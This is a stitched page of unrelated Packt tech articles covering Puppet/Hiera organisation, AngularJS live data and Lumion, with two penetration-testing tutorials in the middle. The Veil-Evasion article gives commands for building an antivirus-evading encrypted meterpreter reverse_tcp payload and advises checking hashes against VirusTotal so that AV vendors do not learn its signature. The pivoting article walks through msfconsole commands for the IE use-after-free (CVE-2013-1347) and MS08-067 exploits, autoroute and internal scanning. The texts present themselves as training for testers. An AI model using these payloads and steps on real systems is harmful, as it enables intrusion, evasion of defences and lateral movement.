- LDAP, when used as a node classifier, returns variables for each node as defined with the puppetVar attribute. They are all set at top scope.
- In Hiera, we set keys that we can map to Puppet variables with the hiera(), hiera_array(), and hiera_hash() functions inside our Puppet code. Puppet 3's data bindings automatically map class parameters to Hiera keys, so in these cases, we don't have to explicitly use the hiera* functions. The defined hierarchy determines how the keys' values change according to the values of other variables. In Hiera, ideally, we should place variables related to our infrastructure and credentials but not OS-related variables (they should stay in modules if we want them to be reusable). A lot of documentation about Hiera shows sample hierarchies with facts such as osfamily and operatingsystem. In my very personal opinion, such variables should not stay there (weighing down the hierarchy), as OS differences should be managed in the classes and modules used and not in Hiera.
- On public shared modules, we typically deal with OS-specific parameters. Modules should be considered as reusable components that know all about how to manage an application on different OSes but nothing about custom logic. They should expose parameters and defines that allow users to determine their behavior and fit their own needs.
- On site module(s), we may place infrastructural parameters, credentials, and any custom logic, more or less based on other variables.

Finally, it's possible and generally recommended to create custom facts that identify the node directly from the agent. An example of this approach is a totally facts-driven infrastructure, where all the node-identifying variables, upon which all the other parameters are defined, are set as facts.
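A custom fact of this kind can be as simple as the following Ruby sketch (an illustration, not code from the article), which derives a role fact from the hostname; the naming scheme is obviously an assumption:

    # modules/site/lib/facter/role.rb
    # Example: a host named "web01" gets role => "web"
    Facter.add(:role) do
      setcode do
        hostname = Facter.value(:hostname)
        hostname.gsub(/\d+$/, '')  # strip the trailing digits
      end
    end

In practice, the fact could also read its value from a local file dropped at provisioning time, which keeps the node-identifying data on the node itself.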
Defining the configuration files provided to the nodes

It's almost certain that we will need to manage configuration files with Puppet and that we need to store them somewhere, either as plain static files to serve via Puppet's fileserver functionality using the source argument of the File type, or as .erb templates. While it's possible to configure custom fileserver shares for static files and absolute paths for templates, it's definitely recommended to rely on the modules' autoloading conventions and place such files inside custom or public modules, unless we decide to use Hiera for them. Configuration files, therefore, are typically placed in:

- Public modules: These may provide default templates that use variables exposed as parameters by the modules' classes and defines. As users, we don't directly manage the module's template but the variables used inside it. A good and reusable module should allow us to override the default template with a custom one. In this case, our custom template should be placed in a site module. If we've forked a public shared module and maintain a custom version, we might be tempted to place all our custom files and templates there. Doing so, we lose reusability and gain, maybe, some short-term simplicity.
- Site module(s): These are, instead, a more correct place for custom files and templates if we want to maintain a setup based on unforked public shared modules plus custom site ones, where all our stuff stays confined in one or a few modules. This allows us to recreate similar setups just by copying and modifying our site modules, as all our logic, files, and resources are concentrated there.
- Hiera: Thanks to the smart hiera-file backend, Hiera can be an interesting alternative place to store configuration files, both static ones and templates. We benefit from the hierarchy logic that works for us and can manage any kind of file without touching modules.
- Custom fileserver mounts can be used to serve any kind of static files from any directory of the Puppet Master. They can be useful if we need to provide, via Puppet, files generated or managed by third-party scripts or tools. An entry in /etc/puppet/fileserver.conf like:

    [data]
    path /etc/puppet/static_files
    allow *.example.com

  allows serving a file like /etc/puppet/static_files/generated/file.txt with the argument:

    source => 'puppet:///data/generated/file.txt',

Defining custom resources and classes

We'll probably need to provide custom resources, which are not declared in the shared modules, to our nodes, because these resources are too specific. We'll probably want to create some grouping classes, for example, to manage the common baseline of resources and classes we want applied to all our nodes. This is typically a bunch of custom code and logic that we have to place somewhere. The usual locations are as follows:

- Shared modules: These are forked and modified to include custom resources; as already outlined, this approach doesn't pay in the long term.
- Site module(s): These are the preferred place for custom stuff, including classes where we can manage common baselines, role classes, and other container classes.
- Hiera, partially, if we are fond of the create_resources function fed by hashes provided in Hiera. In this case, somewhere (in a site or shared module or maybe even in site.pp), we have to place the create_resources statements.
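As a sketch of that last approach (an assumption rather than code from the article), a class in a site module could create user resources from a hash looked up in Hiera:

    class site::users {
      # The 'site_users' key name is arbitrary; the empty hash is the default
      # when nothing is found in the hierarchy.
      $users = hiera_hash('site_users', {})
      create_resources('user', $users)
    }

    # In a Hiera YAML data source:
    # site_users:
    #   admin:
    #     ensure: present
    #     uid: '1001'
    #   deploy:
    #     ensure: present
    #     uid: '1002'

This keeps the list of users entirely in data, while the site module only holds the minimal glue code.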
The Foreman

The Foreman is definitely the biggest open source software product related to Puppet that is not directly developed by Puppet Labs. The project was started by Ohad Levy, who now works at Red Hat and leads its development, supported by a great team of internal employees and community members.

The Foreman can work as a Puppet ENC and reporting tool; it presents an alternative to the Inventory System, and most of all, it can manage the whole lifecycle of a system, from provisioning to configuration and decommissioning. Some of its features have been quite ahead of their time. For example, the foreman() function made possible for a long time what is done now with the puppetdbquery module. It allows direct queries of all the data gathered by The Foreman: facts, node classification, and Puppet-run reports. Let's look at this example, which assigns to the $web_servers variable the list of hosts that belong to the web hostgroup and have reported successfully in the last hour:

    $web_servers = foreman('hosts', 'hostgroup ~ web and status.failed = 0 and last_report < "1 hour ago"')

This was possible long before PuppetDB was even conceived. The Foreman really deserves at least a book by itself, so here we will just summarize its features and explore how it can fit in a Puppet architecture. We can decide which components to use:

- Systems provisioning and life-cycle management
- Nodes' IP addressing and naming
- The Puppet ENC function, based on a complete web interface
- Management of client certificates on the Puppet Master
- The Puppet reporting function, with a powerful query interface
- The facts querying function, equivalent to the Puppet Inventory system

For some of these features, we may need to install Foreman's Smart Proxies on some infrastructural servers. The proxies are registered on the central Foreman server and provide a way to remotely control relevant services (DHCP, PXE, DNS, Puppet Master, and so on).

The web GUI, based on Rails, is quite complete and appealing, but it might prove cumbersome when we have to deal with a large number of nodes. For this reason, we can also manage Foreman via the CLI. The original foreman-cli command has been around for years but is now deprecated in favor of the new hammer (https://github.com/theforeman/hammer-cli) with the Foreman plugin, which is very versatile and powerful, as it allows us to manage via the command line most of what we can do on the web interface.

Roles and profiles

In 2012, Craig Dunn wrote a blog post (http://www.craigdunn.org/2012/05/239/) that quickly became a point of reference on how to organize Puppet code. He discussed his concept of roles and profiles.

The role describes what the server represents: a live web server, a development web server, a mail server, and so on. Each node can have one and only one role. Note that in his post, he manages environments inside roles (two web servers in two different environments have two different roles):

    node www1 {
      include ::role::www::dev
    }
    node www2 {
      include ::role::www::live
    }
    node smtp1 {
      include ::role::mailserver
    }

Then, he introduces the concept of profiles, which include and manage modules to define a logical technical stack.
A role can include one or more profiles:

    class role {
      include profile::base
    }
    class role::www inherits role {
      include ::profile::tomcat
    }

In environment-related subroles, we can manage the exceptions we need (here, for example, the www::dev role includes both the database and webserver::dev profiles):

    class role::www::dev inherits role::www {
      include ::profile::webserver::dev
      include ::profile::database
    }
    class role::www::live inherits role::www {
      include ::profile::webserver::live
    }

Usage of class inheritance here is not mandatory, but it is useful to minimize code duplication. This model expects modules to be the only components where resources are actually defined and managed; they are supposed to be reusable (we use them without modifying them) and manage only the components they are written for.

In profiles, we can manage resources and the ordering of classes; we can initialize variables and use them as values for arguments in the declared classes, and we can generally benefit from having an extra layer of abstraction:

    class profile::base {
      include ::networking
      include ::users
    }
    class profile::tomcat {
      class { '::jdk': }
      class { '::tomcat': }
    }
    class profile::webserver {
      class { '::httpd': }
      class { '::php': }
      class { '::memcache': }
    }

In profile subclasses, we can manage exceptions or particular cases:

    class profile::webserver::dev inherits profile::webserver {
      Class['::php'] {
        loglevel => "debug"
      }
    }

This model is quite flexible and has gained a lot of attention and endorsement from Puppet Labs. It's not the only approach that we can follow to organize the resources we need for our nodes in a sane way, but it's the current best practice and a good point of reference, as it formalizes the concept of role and shows how we can organize and add layers of abstraction between our nodes and the modules we use.

The data and the code

Hiera's crusade, and possibly its main reason to exist, is data separation. In practical terms, this means converting Puppet code like the following:

    $dns_server = $zone ? {
      'it'    => '1.2.3.4',
      default => '8.8.8.8',
    }
    class { '::resolver':
      server => $dns_server,
    }

into something where there's no trace of local settings, like:

    $dns_server = hiera('dns_server')
    class { '::resolver':
      server => $dns_server,
    }

With Puppet 3, the preceding code can be simplified even further to just the following line:

    include ::resolver

This expects the resolver::server key to be evaluated as needed in our Hiera data sources.
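For instance (an illustrative sketch, not from the original), a common.yaml data source could provide the class parameter directly, relying on Puppet 3's data bindings, and a zone-specific data source could override it:

    ---
    # common.yaml
    resolver::server: 8.8.8.8

    ---
    # zone/it.yaml (hypothetical zone-level data source)
    resolver::server: 1.2.3.4

The hierarchy, not the manifest, decides which value a given node gets.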
The advantages of having data (in this case, the IP of the DNS server, whatever the logic used to elaborate it) in a separate place are clear:

- We can manage and modify data without changing our code
- Different people can work on data and code
- Hiera's pluggable backend system dramatically enhances how and where data can be managed, allowing seamless integration with third-party tools and data sources
- Code layout is simpler and more error-proof
- The lookup hierarchy is configurable

Nevertheless, there are a few little drawbacks, or maybe just necessary side effects or evolutionary steps. They are as follows:

- What we've learned about Puppet and used to do without Hiera is obsolete
- We don't see, directly in our code, the values we are using
- We have two different places to look at to understand what the code does
- We need to set the variables we use in our hierarchy as top scope variables or facts, or anyway refer to them with a fixed, fully qualified name
- We might have to refactor a lot of existing code to move our data and logic into Hiera

A personal note: I've been quite a late jumper on the Hiera wagon. While developing modules with the ambition that they be reusable, I decided I couldn't exclude users who weren't using this additional component. So, until Puppet 3, with Hiera integrated in it, became mainstream, I didn't want to force the usage of Hiera in my code. Now things are different. Puppet 3's data bindings change the whole scene; Hiera is deeply integrated and is here to stay, and so, even if we can happily live without using it, I would definitely recommend its usage in most cases.

Veil-Evasion

Packt
18 Jun 2014
6 min read
(For more resources related to this topic, see here.)

A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion (www.Veil-Evasion.com), now provides effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management. As a framework, Veil-Evasion possesses several features, which include the following:

- It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python
- It can use Metasploit-generated shellcode
- It can integrate third-party tools such as Hyperion (which encrypts an EXE file with AES-128 bit encryption), PEScrambler, and BackDoor Factory
- The Veil-Evasion_evasion.cna script allows Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike
- Payloads can be generated and seamlessly substituted into all PsExec calls
- Users have the ability to reuse shellcode or implement their own encryption methods
- Its functionality can be scripted to automate deployment
- Veil-Evasion is under constant development, and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system)

Veil-Evasion can generate an exploit payload; the standalone payloads include the following options:

- Minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity.
- Sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor.
- PowerShell shellcode injector.

When the payloads have been created, they can be delivered to the target in one of the following two ways:

- Upload and execute using Impacket and the PTH toolkit
- UNC invocation

Veil-Evasion is available from the Kali repositories and is installed by simply entering apt-get install veil-evasion in a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script.

Veil-Evasion presents the user with the main menu, which shows the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot:

Veil-Evasion is undergoing rapid development, with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot:

To obtain information on a specific payload, type info <payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload:

The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack.
The required options include the names of the options as well as their default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the command prompt.

If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of x01x02, without quotes and newlines (n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot:

In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot:

The user will then be presented with the output menu and a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, you will have the option of either using Pyinstaller to create the EXE file or generating Py2Exe files, as shown in the following screenshot:

The final screen displays information on the generated payload, as shown in the following screenshot:

The exploit could also have been created directly from the command line using the following options:

    kali@linux:~ ./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o -output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444

Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and its behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour. This is why users are clearly admonished with the message "don't submit samples to any online scanner!"

Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows:

Testing thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use the payload with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion. When the listener is functional, send the exploit to the target system. When the target launches it, it will establish a reverse shell back to the attacker's system.
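For reference, a matching listener might be set up along these lines (a sketch; the LHOST and LPORT values are simply those used when generating the payload above):

    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.43.134
    msf exploit(handler) > set LPORT 4444
    msf exploit(handler) > exploit -j

The -j flag runs the handler as a background job, so the console remains available while waiting for the connection.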
Summary Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of the exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection. Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [Article] Web app penetration testing in Kali [Article] Customizing a Linux kernel [Article]

Using the client as a pivot point

Packt
17 Jun 2014
6 min read
Pivoting

To set our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card in the machine that is connected to another network, which we cannot reach without using the machine that we exploit. As an example, we will use three machines, with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine as the second victim. The scenario is that we get a client to go to our malicious site, and we use an exploit called Use after free against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website:

The exploit listed at the top of the list is one that is against Internet Explorer 9. As an example, we will target the exploit that is against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated.

Start up your metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot:

One concern is that it is rated as good, but we like to find ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and have to make the choice to either write our own exploit or document it and move on with the testing.

For the example we use here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the metasploit window:

    use exploit/windows/browser/ie_cgenericelement_uaf
    set SRVHOST 192.168.177.170
    set LHOST 192.168.177.170
    set PAYLOAD windows/meterpreter/reverse_tcp
    exploit

An example of the results of the preceding commands is shown in the following screenshot:

As the previous screenshot shows, we now have the URL that we need to get the user to access. For our purposes, we will just copy and paste it in Internet Explorer 8, which is running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot:

We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot:

As the previous screenshot shows, we are in luck. We have a second network card connected and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network.
This is another reason why we chose the Meterpreter shell: it provides us with the capability to set the route up. In the shell, enter run autoroute -s 10.2.0.0/24 to set a route up to our 10 network. Once the command is complete, we will view our routing table by entering run autoroute -p. An example of this is shown in the following screenshot:

As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will background session 1; press Ctrl + Z to background the session. We will use the scan capability from within our metasploit tool. Enter the following commands:

    use auxiliary/scanner/portscan/tcp
    set RHOSTS 10.2.0.0/24
    set PORTS 139,445
    set THREADS 50
    run

The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in metasploit instead; enter nmap -sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results for this scan is shown in the following screenshot:

We now have a target, and we could use a number of methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Server Service buffer overflow. In the metasploit window, set the session in the background and enter the following commands:

    use exploit/windows/smb/ms08_067_netapi
    set RHOST 10.2.0.149
    set PAYLOAD windows/meterpreter/bind_tcp
    exploit

If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration on the machine. From here, it is just a matter of carrying out the process that we followed before, and if you find another dual-homed machine, then you can make another pivot and continue. An example of the results is shown in the following screenshot:

As the previous screenshot shows, the pivot was successful, and we now have another session open within metasploit. This is reflected with the Local Pipe | Remote Pipe reference. Once you complete reviewing the information, enter sessions to display the information for the sessions. An example of this result is shown in the following screenshot:

Summary

In this article, we looked at the powerful technique of establishing a pivot point from a client.

Resources for Article:

Further resources on this subject:
Installation of Oracle VM VirtualBox on Linux [article]
Using Virtual Destinations (Advanced) [article]
Quick Start into Selenium Tests [article]
Working with Live Data and AngularJS

Packt
12 Jun 2014
14 min read
(For more resources related to this topic, see here.) Big Data is a new field that is growing every day. HTML5 and JavaScript applications are being used to showcase these large volumes of data in many new interesting ways. Some of the latest client implementations are being accomplished with libraries such as AngularJS. This is because of its ability to efficiently handle and organize data in many forms. Making business-level decisions off of real-time data is a revolutionary concept. Humans have only been able to fathom metrics based off of large-scale systems, in real time, for the last decade at most. During this time, the technology to collect large amounts of data has grown tremendously, but the high-level applications that use this data are only just catching up. Anyone can collect large amounts of data with today's complex distributed systems. Displaying this data in different formats that allow for any level of user to digest and understand its meaning is currently the main portion of what the leading-edge technology is trying to accomplish. There are so many different formats that raw data can be displayed in. The trick is to figure out the most efficient ways to showcase patterns and trends, which allow for more accurate business-level decisions to be made. We live in a fast paced world where everyone wants something done in real time. Load times must be in milliseconds, new features are requested daily, and deadlines get shorter and shorter. The Web gives companies the ability to generate revenue off a completely new market and AngularJS is on the leading edge. This new market creates many new requirements for HTML5 applications. JavaScript applications are becoming commonplace in major companies. These companies are using JavaScript to showcase many different types of data from inward to outward facing products. Working with live data sets in client-side applications is a common practice and is the real world standard. Most of the applications today use some type of live data to accomplish some given set of tasks. These tasks rely on this data to render views that the user can visualize and interact with. There are many advantages of working with the Web for data visualization, and we are going to showcase how these tie into an AngularJS application. AngularJS offers different methods to accomplish a view that is in charge of elegantly displaying large amounts of data in very flexible and snappy formats. Some of these different methods feed directives' data that has been requested and resolved, while others allow the directive to maintain control of the requests. We will go over these different techniques of how to efficiently get live data into the view layer by creating different real-world examples. We will also go over how to properly test directives that rely on live data to achieve their view successfully. Techniques that drive directives Most standard data requirements for a modern application involve an entire view that depends on a set of data. This data should be dependent on the current state of the application. The state can be determined in different ways. A common tactic is to build URLs that replicate a snapshot of the application's state. This can be done with a combination of URL paths and parameters. URL paths and parameters are what you will commonly see change when you visit a website and start clicking around. An AngularJS application is made up of different route configurations that use the URL to determine which action to take. 
Each configuration will have an associated controller, template, and other options. These configurations work in unison to get data into the application in the most efficient ways.

AngularUI also offers its own routing system. This UI-Router is a simple system built on complex concepts, which allows nested views to be controlled by different state options. This concept yields the same result as ngRoute, which is to get data into the controller; however, UI-Router does it in a more eloquent way, which creates more options. AngularJS 2.0 will contain a hybrid router that utilizes the best of each.

Once the controller gets the data, it feeds the retrieved data to the template views. The template is what holds the directives that are created to perform the view layer functionality. The controller feeds directives' data, which forces the directives to rely on the controllers to be in charge of the said data. This data can either be fed immediately after the route configurations are executed or the application can wait for the data to be resolved.

AngularJS offers you the ability to make sure that data requests have been successfully accomplished before any controller logic is executed. The method is called resolving data, and it is utilized by adding the resolve functions to the route configurations. This allows you to write the business logic in the controller in a synchronous manner, without having to write callbacks, which can be counter-intuitive. The XHR extensions of AngularJS are built using promise objects. These promise objects are basically a way to ensure that data has been successfully retrieved or to verify whether an error has occurred. Since JavaScript embraces callbacks at the core, there are many points of failure with respect to timing issues of when data is ready to be worked with. This is where libraries such as the Q library come into play. The promise object allows the execution thread to resemble a more synchronous flow, which reduces complexity and increases readability.

The $q library

The $q factory is a lite instantiation of the formally accepted Q library (https://github.com/kriskowal/q). This lite package contains only the functions that are needed to defer JavaScript callbacks asynchronously, based on the specifications provided by the Q library. The benefits of using this object are immense when working with live data. Basically, the $q library allows a JavaScript application to mimic synchronous behavior when dealing with asynchronous data requests or methods that are not thread blocked by nature. This means that we can now successfully write our application's logic in a way that follows a synchronous flow.

ES6 (ECMAScript6) incorporates promises at its core. This will eventually alleviate the need for many functions inside the $q library, or the entire library itself, in AngularJS 2.0.

The core AngularJS service that is related to CRUD operations is called $http. This service uses the $q library internally to allow the powers of promises to be used anywhere a data request is made. Here is an example of a service that uses the $q object in order to create an easy way to resolve data in a controller. Refer to the following code:

    this.getPhones = function() {
      var request = $http.get('phones.json'),
          promise;
      promise = request.then(function(response) {
        return response.data;
      }, function(errorResponse) {
        return errorResponse;
      });
      return promise;
    };

Here, we can see that the phoneService function uses the $http service, which can request all the phones.
The phoneService function creates a new request object that calls a then function, which returns a promise object. This promise object is returned synchronously. Once the data is ready, the then function is called and the correct data response is returned.

This service is best showcased when used in conjunction with a resolve function that feeds data into a controller. The resolve function will accept the promise object being returned and will only allow the controller to be executed once all of the phones have been resolved or rejected. The rest of the code that is needed for this example is the application's configuration code. The config process is executed on the initialization of the application. This is where the resolve function is supposed to be implemented. Refer to the following code:

    var app = angular.module('angularjs-promise-example', ['ngRoute']);

    app.config(function($routeProvider) {
      $routeProvider.when('/', {
        controller: 'PhoneListCtrl',
        templateUrl: 'phoneList.tpl.html',
        resolve: {
          phones: function(phoneService) {
            return phoneService.getPhones();
          }
        }
      }).otherwise({
        redirectTo: '/'
      });
    });

    app.controller('PhoneListCtrl', function($scope, phones) {
      $scope.phones = phones;
    });

A live example of this basic application can be found at http://plnkr.co/edit/f4ZDCyOcud5WSEe9L0GO?p=preview.

Directives take over once the controller executes its initial context. This is where the $compile function goes through all of its stages and links directives to the controller's template. The controller will still be in charge of driving the data that is sitting inside the template view. This is why it is important for directives to know what to do when their data changes.

How should data be watched for changes?

Most directives are on a need-to-know basis about the details of how they receive the data that is in charge of their view. This is a separation of logic that reduces cyclomatic complexity in an application. The controllers should be in charge of requesting data and passing this data to directives through their associated $scope object. Directives should be in charge of creating DOM based on the data they receive and when the data changes. There are an infinite number of possibilities that a directive can try to achieve once it receives its data. Our goal is to showcase how to watch live data for changes and how to make sure that this works at scale so that our directives have the opportunity to fulfill their specific tasks.

There are three built-in ways to watch data in AngularJS. Directives use the following methods to carry out specific tasks based on the different conditions set in the source of the program:

- Watching an object's identity for changes
- Recursively watching all of the object's properties for changes
- Watching just the top level of an object's properties for changes

Each of these methods has its own specific purpose. The first method can be used if the variable that is being watched is a primitive type. The second method is used for deep comparisons between objects. The third is used to do a shallow watch on an array of any type or just on a normal object.

Let's look at an example that shows the last two watcher types. This example is going to use jsPerf to showcase our logic. We are leaving the first watcher out because it only watches primitive types and we will be watching many objects for different levels of equality. This example sets the $scope variable in the app's run function because we want to make sure that the jsPerf test resets each data set upon initialization. Refer to the following code:
    app.run(function($rootScope) {
      $rootScope.data = [
        {'bob': true}, {'frank': false}, {'jerry': 'hey'}, {'bargle': false},
        {'bob': true}, {'bob': true}, {'frank': false}, {'jerry': 'hey'},
        {'bargle': false}, {'bob': true}, {'bob': true}, {'frank': false}
      ];
    });

This run function sets up the data object that we will watch for changes. This will be constant throughout every test we run and will be reset to this form at the beginning of each test.

Doing a deep watch on $rootScope.data

This watch function will do a deep watch on the data object. The true flag is the key to setting off a deep watch. The purpose of a deep comparison is to go through every object property and compare it for changes on every digest. This is an expensive function and should be used only when necessary. Refer to the following code:

    app.service('Watch', function($rootScope) {
      return {
        run: function() {
          $rootScope.$watch('data', function(newVal, oldVal) {
          }, true);
          // The digest is here because of the jsPerf test. We are using this
          // run function to mimic a real environment.
          $rootScope.$digest();
        }
      };
    });

Doing a shallow watch on $rootScope.data

The shallow watch is called whenever a top-level object is changed in the data object. This is less expensive because the application does not have to traverse n levels of data. Refer to the following code:

    app.service('WatchCollection', function($rootScope) {
      return {
        run: function() {
          $rootScope.$watchCollection('data', function(n, o) {
          });
          $rootScope.$digest();
        }
      };
    });

During each individual test, we get each watcher service and call its run function. This fires the watcher on initialization, and then we push another test object to the data array, which fires the watcher's trigger function again. That is the end of the test. We are using jsperf.com to show the results. Note that the watchCollection function is much faster and should be used in cases where it is acceptable to shallow watch an object. The example can be found at http://jsperf.com/watchcollection-vs-watch/5. Refer to the following screenshot:

This test implies that the watchCollection function is a better choice to watch an array of objects that can be shallow watched for changes. This test also holds for an array of strings, integers, or floats. This brings up more interesting points, such as the following:

- Does our directive depend on a deep watch of the data?
- Do we want to use the $watch function, even though it is slow and memory taxing?
- Is it possible to use the $watch function if we are using large data objects?

The directives that have been used in this book have used the watch function to watch data directly, but there are other methods to update the view if our directives depend on deep watchers and very large data sets.

Directives can be in charge

There are some libraries that believe that elements can be in charge of when they should request data. Polymer (http://www.polymer-project.org/) is a JavaScript library that allows DOM elements to control how data is requested, in a declarative format. This is a slight shift from the processes that have been covered so far in this article when thinking about what directives are meant for and how they should receive data. Let's come up with an actual use case that could possibly allow this type of behavior. Let's consider a page that has many widgets on it.
A widget is a directive that needs a set of large data objects to render its view. To be more specific, let's say we want to show a catalog of phones. Each phone has a very large amount of data associated with it, and we want to display this data in a very clean, simple way. Since watching large data sets can be very expensive, what will allow directives to always have the data they require, depending on the state of the application?

One option is not to use the controller to resolve the large data set and inject it into a directive, but rather to use the controller to request directive configurations that tell the directive to request certain data objects. Some people would say this goes against normal conventions, but I say it's necessary when dealing with many widgets in the same view that individually deal with large amounts of data. This method of using directives to determine when data requests should be made is only suggested if many widgets on a page depend on large data sets. To create this in a real-life example, let's take the phoneService function, which was created earlier, and add a new method to it called getPhone. Refer to the following code:

this.getPhone = function(config) {
  return $http.get(config.url);
};

Now, instead of requesting all the details on the initial call, the original getPhones method only needs to return phone objects with a name and id value. This allows the application to request the details on demand. To do this, we do not need to alter the getPhones method that was created earlier. We only need to alter the data that is supplied when the request is made. It should be noted that any directive that requests data should be tested to prove that it is requesting the correct data at the right time.

Testing directives that control data

Since the controller is usually in charge of how data is incorporated into the view, many directives do not have to be coupled with logic related to how that data is retrieved. Keeping things separate is always good and is encouraged, but in some cases, it is necessary that directives and XHR logic be used together. When these use cases reveal themselves in production, it is important to test them properly. The tests in the book use two very generic steps to prove business logic. These steps are as follows:

- Create, compile, and link DOM to the AngularJS digest cycle
- Test scope variables and DOM interactions for correct outputs

Now, we will add one more step to the process. This step will lie in the middle of the two steps. The new step is as follows:

- Make sure all data communication is fired correctly

AngularJS makes it very simple to add this resource-related logic because it has a built-in backend service mock, which allows many different ways to create fake endpoints that return structured data. The service is called $httpBackend.
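As a rough illustration, the following test sketch shows how $httpBackend can be used to prove that the getPhone method requests the URL passed in its config object. It assumes phoneService is registered on the angularjs-promise-example module defined earlier; the URL and response payload are hypothetical values used only for this example:

describe('phoneService.getPhone', function() {
  var phoneService, $httpBackend;

  // Load the module defined earlier in this example.
  beforeEach(module('angularjs-promise-example'));

  beforeEach(inject(function(_phoneService_, _$httpBackend_) {
    phoneService = _phoneService_;
    $httpBackend = _$httpBackend_;
  }));

  afterEach(function() {
    // Fail the test if a request was expected but never made,
    // or made but never flushed.
    $httpBackend.verifyNoOutstandingExpectation();
    $httpBackend.verifyNoOutstandingRequest();
  });

  it('requests the detail URL passed in its config object', function() {
    // Hypothetical URL and payload; only the request/response flow
    // is being demonstrated here.
    $httpBackend.expectGET('phones/nexus-s.json')
      .respond({ id: 'nexus-s', name: 'Nexus S' });

    var result;
    phoneService.getPhone({ url: 'phones/nexus-s.json' })
      .then(function(response) {
        result = response.data;
      });

    // flush() resolves the fake backend's pending requests synchronously.
    $httpBackend.flush();

    expect(result.name).toBe('Nexus S');
  });
});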

article-image-unleashing-powers-lumion
Packt
12 Jun 2014
22 min read
Save for later

Unleashing the powers of Lumion

Lumion supports a direct import of SketchUp files, which means that we don't need to use any special format to have our 3D model in Lumion. But if you are working with modeling packages such as 3ds Max, Maya, and Blender, you need to use a different approach by exporting a COLLADA or FBX file, as these two are the best formats to work with in Lumion. In particular situations, we may need to use our own animations. You may be aware that we can import basic animations into Lumion from 3D modeling packages such as 3ds Max.

